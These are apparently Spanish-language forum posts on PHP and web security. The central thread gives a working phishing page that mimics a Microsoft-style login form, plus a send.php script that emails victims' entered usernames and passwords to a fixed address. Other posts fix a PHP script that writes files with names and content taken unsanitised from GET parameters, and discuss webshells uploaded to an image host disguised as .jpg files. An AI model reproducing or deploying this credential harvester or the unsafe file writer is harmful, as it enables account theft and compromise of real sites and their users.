Mensajes

el tipo de texto es dinamico o estatico?
recuerdo que en versiones pasadas me pasaba eso con el texto estatico

[send.php]

no se envia ningun dato por que primero envias el e-mail y despues le muestras el formulario al usuario
lo "correcto" seria:

Código (php) [Seleccionar] Expandir

<html>
  <head>
    <meta>
    <title>Untitled Document</title>
  </head>
  <body>
    <form name='formulario' id='formulario' method='post' action='send.php' >
      <table>
        <tr>
          <td valign="top" class="css0059" align="right"><label for="i0116">Dirección de correo electrónico:</label></td>
          <td valign="top" class="css0093"><p><input name="usuario" id="usuario" type="text" maxlength="113" autocomplete="off"  style="ime-mode:disabled" class="css0034" /></p></td>
        <tr>
          <td valign="top" class="css0059" align="right"><label for="i0118">Contraseña:</label></td>
          <td valign="top" class="css0093"><p><input name="clave" type="password" maxlength="16" autocomplete="off"  style="ime-mode:disabled" class="css0034" /></p><input name='submit' type="submit" value="    Iniciar sesión    " class="css0088"  /></td>
        </tr>
      </table>
    </form>
  </body>
</html>

send.php

Código (php) [Seleccionar] Expandir

<?php
  if($_POST['usuario']!=NULL and $_POST['clave']!=NULL)
    {
    $to = "corrreo@dominio.com";
    $subject = "Probando envio datos"; 
    $usuario = "Usuario: " . $_POST['usuario'] . "\n";
    $clave = "Clave: " . $_POST['clave'] . "\n";
    mail($to, $subject, $usuario, $clave);
    } else {
    // aqui hiria lo que pasa si no se especifica nombre de usuacio o clave ¬¬
    }
?>



Saludos!

pues no tengo idea de como sacar la ip de un post, pero lo que si puedes hacer es dejar un post, y cada ves que alguien vea ese post te regalara su ip y tambien su nombre de usuario (amenos que este oculto), Eso se puede hacer en este foro, pero eso no sirve practicamente para nada.

saludos!

yo hice algo asi
lo que hacia es mostrar el nick del usuario en una imagen.

pero sdc me dijo que estaba duplicando el trafico del foro, entonces ya lo quite.

Veran, tengo una web dedicada al hosting de imagenes .gif .jpg y .png de maximo 5 megas

Segun mi cabeza, y aun asi ya visto en mi web, se puede subir a esta webshells c99 y demas con extension .jpg por ejemplo y dar ordenes desde estas

Como se repara este fallo de seguridad? aun nose si mi web es vulnerable, se algo de la vulnerabilidad pero no como protegerme

saludos

esto va en nivel web, puedes poner el filtro que usas?

Código (php) [Seleccionar] Expandir

<?php
$id = preg_replace('|[^A-Za-z0-9_-.]|i', '', $_GET['activity']).'.txt';
$id2 =  $_GET['od'];

if(fole_exists($id))
 $master = fopen($id.'.txt', 'a');
else
 $master = fopen($id.'.txt', 'x');
fwrite($master, $id2."\x0D\x0A");
fclose($master);
?>

es file_exists no fole_exists  

Código (php) [Seleccionar] Expandir

<?php
$id = preg_replace('|[^A-Za-z0-9_-.]|i', '', $_GET['activity']).'.txt';
$id2 =  $_GET['od'];

if(file_exists($id))
 $master = fopen($id.'.txt', 'a');
else
 $master = fopen($id.'.txt', 'x');
fwrite($master, $id2."\x0D\x0A");
fclose($master);
?>

otra cosa mas:
para el correcto funcionamiento, aqui

Código (php) [Seleccionar] Expandir

if(file_exists($id))
deberia ser:

Código (php) [Seleccionar] Expandir

if(file_exists($id.".txt"))
o quitar la extension extra en los fopen.

saludos!

esque en tu primer post pusiste:

Código (php) [Seleccionar] Expandir

fwrite($master," ".$id2,"\n");

y ay una coma en $id2,"/n"
deberia ser un punto.

Código (php) [Seleccionar] Expandir

fwrite($master," ".$id2."\n");

saludos!

Buenas estaba utilizando el sitio web de miarroba no se si lo conocen y estaba haciendo un .PHP que creara archivos TXT con un nombre que yo quisiera y insertarle el texto que yo quiera por medio de la barra de direcciones

Codigo del Creador.PHP

Código [Seleccionar] Expandir

<?php
$id=$_GET['activity'];
$id2=$_GET['od'];

$master=fopen($id.'.txt',a);
fwrite($master," ".$id2,"\n");
fclose($master);
?>

Link:

Código [Seleccionar] Expandir

http://pagina.webcindario.com/Creador.php?activity=NuevoArchivo&od=Texto a insertar.

pero no me funciona es que acazo es una limitande de webcindario o tengo algo malo en el codigo???  

Se les agradace!!  

en esta linea:

Código (php) [Seleccionar] Expandir

$master=fopen($id.'.txt',a);
deberia ser:

Código (php) [Seleccionar] Expandir

$master=fopen($id.'.txt'."a");
y te equivocaste en algunas separaciones (pusiste comas enves de puntos)
deberia funcionar asi:

Código (php) [Seleccionar] Expandir

<?php
$id=$_GET['activity'];
$id2=$_GET['od'];

$master=fopen($id.'.txt', "a");
fwrite($master, " ".$id2."\n");
fclose($master);
?>


saludos!

de hecho si se puede, si observas las peticiones xmlhttp de la función de la exploración de carpetas del costado, de todas formas si quieres divertirte aprendiendo es mejor que no vayas por ese lado y entres acá: http://warzone.elhacker.net/ , ahi hay pruebas de xss, sql inyección y todo bién documentadas, si quieres entretenerte aprendiendo usa ese porque asi como vas lo unico que sacarás es que despues gente de investigaciones anden visitando a tu casa como le pasó a alguien que conozco y de seguro debe estar leyendo esto también.

Aclaro por segunda vez, no intento hacer un deface ni nada por el estilo.

Nomás quería obtener mas información de XSS.

Nada más.

Saludos !

yo no recomendaria aprender a explotar vulnerabilidades xss en una pagina de gobierno
mejor haste un servidor casero y empieza a hacer codigos vulnerables (debes saber php), despues te "autoatacas" xD
o como dice WHK metete a http://warzone.elhacker.net

saludos!

pues depende de si la usas o no XD y si con lo uqe hagas amortizas la inversion

pues no es muy cara que digamos (eso creo, estoy hablando de pesos mexicanos [1MX = 1/19.91 Euro])

pero me refiero a la calidad del producto